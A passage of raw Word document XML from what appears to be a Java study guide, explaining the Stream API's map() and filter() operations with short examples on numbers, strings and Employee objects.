      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> each element of the stream to another object or value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E45E5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1F049A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 map(Function&lt;? super T, ? extends R&gt; mapper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB0D154"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the elements in the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B2B61"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The type of the elements in the new stream after the transformation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BF3FE"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er</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that defines how each element should be transformed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC23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returns a new stream with the transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47112F2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949FFD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the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9E3A8"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passed to the map() method is applied to each element of the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF6F2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new stream of the transformed data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E93F08"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map() to transform elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23F18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double each number</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F640F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726BA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3C2A73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2D95137D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B19729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2A4DA5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D6FF3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760A3EB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3F86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double each number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532E25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doubledNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C58A05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5F0BCC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B7BC9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C0D4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ubledNumbers);  // Output: [2, 4, 6, 8, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827589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7F020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7DD0F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C54D8B"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multiply each element by 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CBCD8"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is a new list of doubled numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35255ACC"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to extract properties from objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519240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extract the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>names of employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into a new list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087A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F65E0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54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55293CCB" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0E257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BBF36E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1A9B6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D1C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0928B4C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9AB5A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4931F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="394CE85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567A813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34BCD20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D1703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C9DCFE" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2FEA4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6F3B25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1757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new Employee("John"), new Employee("Alice"), new Employee("Bob"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597A5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AFD5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extract names from Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05999B7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employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EE0B0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  // method reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A13D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47E2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C54F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s);  // Output: [John, Alice, Bob]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814CDF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F54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FD23A1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F0C3C81" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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extract the names</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a list of Employee objects using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Employee::getName).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A162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Mapping to a different type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFADB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map an object to a completely different type, such as converting a list of strings into a list of their lengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8AC2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CE26B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53C50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5F0E566" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359D7C5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75B8841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0B98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10C95E9C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183F4A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get the length of each string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2798A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wordLengths = words.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1780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length)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A2EB8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33AD03" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B80FA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Lengths);  // Output: [5, 6, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0FF8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B94E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00933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E1D673F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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map()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string into its </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290EBE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BA4298"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is a stream operation that applies a transformation function to each element in the stream, producing a new stream with the transformed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45999AAF"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when you want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a stream into something else, such as converting objects to other objects, or extracting a specific property (like a field or method result).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D000C5"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of map() is a new stream; it does not modify the original stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1EB1F" w14:textId="7BA242E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88" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02500336"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32" w:name="_Toc197867446"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the filter in the stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w14:paraId="50CC675D" w14:textId="2159C15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dicate-based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a stream based on a condition. It filters the elements of the stream, retaining only those that match a specified condition (predicate). It is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unwanted elements from a stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA63AC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202965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 filter(Predicate&lt;? super T&gt; predicate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BE988"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elements in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDAF35B"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function that returns true for elements that should be kept in the stream, and false for elements that should be excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B6A1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filter()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instead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that contains only the elements that satisfy the given condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77675B3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53228C51"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the stream based on a condition (predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6DE2B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predicate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F071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riginal stream remains </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unmodified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DF757E"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include the elements for which the predicate returns false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AB13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filter() to filter elements based on a condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39170B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all the even numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4428F7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29F135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BB618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3CEE2DD" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E22E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1A1F966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8DAEC4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11A826DC" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE774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only even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CF8E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evenNumbers = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C5CDC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074EC1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09123AA" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B120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venNumbers);  // Output: [2, 4, 6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEE5B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2A2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1000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3E3B87B" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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filter() function to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keep only even numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by passing a lambda expression n -&gt; n % 2 == 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6229238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filter() with objects to select based on a property</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4481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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>filter employees with age greater than 30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621C8FB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CC2165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CDF6C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625FED64" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1522FB6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A12A13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7BF80D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8BD907E" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5CFEF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29AD8D9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21CACA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1172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8C785" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3AED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8A958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3BF68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210495" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AB98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9C78F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47D7D8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A69FA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9487516" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC07A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721BD82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3F44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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B2C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John", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69AD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Alice", 35),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133379D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new Employee("Bob", 40)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D657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DBD915" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A23AB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employees whose age is greater than 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0581F77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filteredEmployees = employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66005C7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 -&gt; e.getAge() &gt; 30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E803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E83B4C" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5137DDE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dEmployees.forEach(e -&gt; System.out.println(e.getName()));  // Output: Alice, Bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748B4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34B9D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CBA19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F01ED65" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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filter() to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> whose age is greater than 30.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FD44F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Chaining filter() with other stream operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B623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hain filter() with other stream operations like map() or collect(). For example, you can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some element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another value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5903B17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DBB37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23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4DC433B0" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AFFC4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411A7DE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5C450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 "date");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED210E3" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDEB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and map to filter long words and convert them to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A082A0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ongWordsUpperCase = words.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5641AA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 -&gt; w.length() &gt; 5) // filter words with length greater than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F690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    // convert them to uppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DCDA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ACD51D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15787E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ngWordsUpperCase);  // Output: [BANANA, CHERRY]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B7F8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7725A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04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4665F7F" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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ords longer than 5 character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uppercase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A3CE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4AEC1AF"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Java Streams is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a stream that satisfy a given condition (predicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F491BA8"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condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B6E802"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riginal stream remains unchanged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF3E64"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commonly used in scenarios where you want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>remove unwanted ele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lect elements based on a specific condition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E770829" w14:textId="3C072F10"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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D9AA0A"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33" w:name="_Toc197867447"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Stream API?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
    </w:p>
    <w:p w14:paraId="32FED1C1" w14:textId="1D968FFD"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 Java,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is a new abstraction that allows you to work with sequences of elements (such as collections, arrays, or I/O channels) in a functional style. The Stream API is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and provides a powerful way to process data in a declarative manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C19581"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Stream API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41915F23"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00FBA380"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allows you to express operations on data in a functional style, making it more concise and readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC1A8C"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operations like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
